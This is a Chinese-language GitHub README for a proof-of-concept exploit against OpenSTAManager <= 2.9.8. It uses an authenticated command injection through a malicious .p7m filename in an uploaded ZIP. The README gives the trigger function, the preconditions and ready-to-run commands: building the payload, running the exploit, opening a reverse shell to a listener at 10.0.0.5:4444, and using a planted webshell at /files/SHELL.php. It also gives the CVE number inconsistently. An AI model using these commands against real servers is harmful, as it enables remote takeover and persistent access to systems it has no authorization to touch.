TheAlc0h0l1c/CVE-2025-69212-PoC
GitHub: TheAlc0h0l1c/CVE-2025-69212-PoC
针对 OpenSTAManager <= 2.9.8 的 CVE-2025-69211 认证后命令注入 RCE 漏洞的 PoC 利用工具,通过上传恶意 P7M 文件名实现远程代码执行。
Stars: 0 | Forks: 0
# CVE-2025-69212 PoC - OpenSTAManager P7M 命令注入 RCE 漏洞利用
针对 **CVE-2025-69212** 的概念验证(PoC)漏洞利用,这是 **OpenSTAManager <= 2.9.8** 中一个经过身份验证的 **OS 命令注入**,会导致 **远程代码执行 (RCE)**。
具有电子发票导入权限的已认证用户可以上传一个包含带有恶意文件名的 `.p7m` 文件的 ZIP,以便在服务器上执行任意命令(触发点:`src/Util/XML.php::decodeP7M`)。
**前提条件:** 具有发票导入权限的已认证账户,且导入方法设置为 `Automatico`。
## 用法
构建 payload zip:
```
python3 genzip.py -o exploit.zip
```
运行漏洞利用:
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip
```
Reverse shell(首先运行 `nc -lvnp 4444`):
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip -l 10.0.0.5 -lp 4444
```
Webshell 落地于 `/files/SHELL.php`:
```
curl "http://target.com/files/SHELL.php?c=id"
```
## 参考
- CVE-2025-69212:https://nvd.nist.gov/vuln/detail/CVE-2025-69212
- 安全公告 (GHSA-25fp-8w8p-mx36) — 由 Łukasz Rybak 发现
仅供授权测试和教学使用。
标签:Python, RCE利用, 无后门, 逆向工具